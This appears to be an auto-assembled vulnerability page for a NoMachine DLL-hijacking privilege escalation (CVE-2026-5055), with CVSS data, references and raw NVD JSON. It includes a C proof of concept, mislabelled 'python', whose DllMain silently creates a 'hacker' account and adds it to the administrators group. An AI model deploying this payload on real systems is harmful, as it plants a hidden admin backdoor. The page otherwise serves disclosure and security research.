CVE-2026-5055

Description

NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the NoMachine Device Server. The product loads a library from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-28494.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nomachine:nomachine:*:*:*:*:*:*:*:* - VULNERABLE

未在提供信息中明确指定

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#include <windows.h>
#include <stdlib.h>

// PoC for CVE-2026-5055: Malicious DLL (DLL Hijacking)
// This code demonstrates how a payload could be executed if the DLL is loaded by a privileged service.

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // Execute arbitrary code with SYSTEM privileges
        // Example: Add a new user to the administrators group
        WinExec("net user hacker P@ssw0rd /add", SW_HIDE);
        WinExec("net localgroup administrators hacker /add", SW_HIDE);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5055
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5055
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5055/
[4] VulDB https://vuldb.com/cve/CVE-2026-5055
[5] https://www.zerodayinitiative.com/advisories/ZDI-26-249/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5055", "sourceIdentifier": "[email protected]", "published": "2026-04-11T01:16:18.017", "lastModified": "2026-04-15T18:41:22.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NoMachine Uncontrolled Search Path Element Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of NoMachine. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\n\nThe specific flaw exists within the NoMachine Device Server. The product loads a library from an unsecured location. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-28494."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nomachine:nomachine:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.4.14", "matchCriteriaId": "99ABF7D0-787B-4153-8F4F-53F5B59609B4"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-249/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}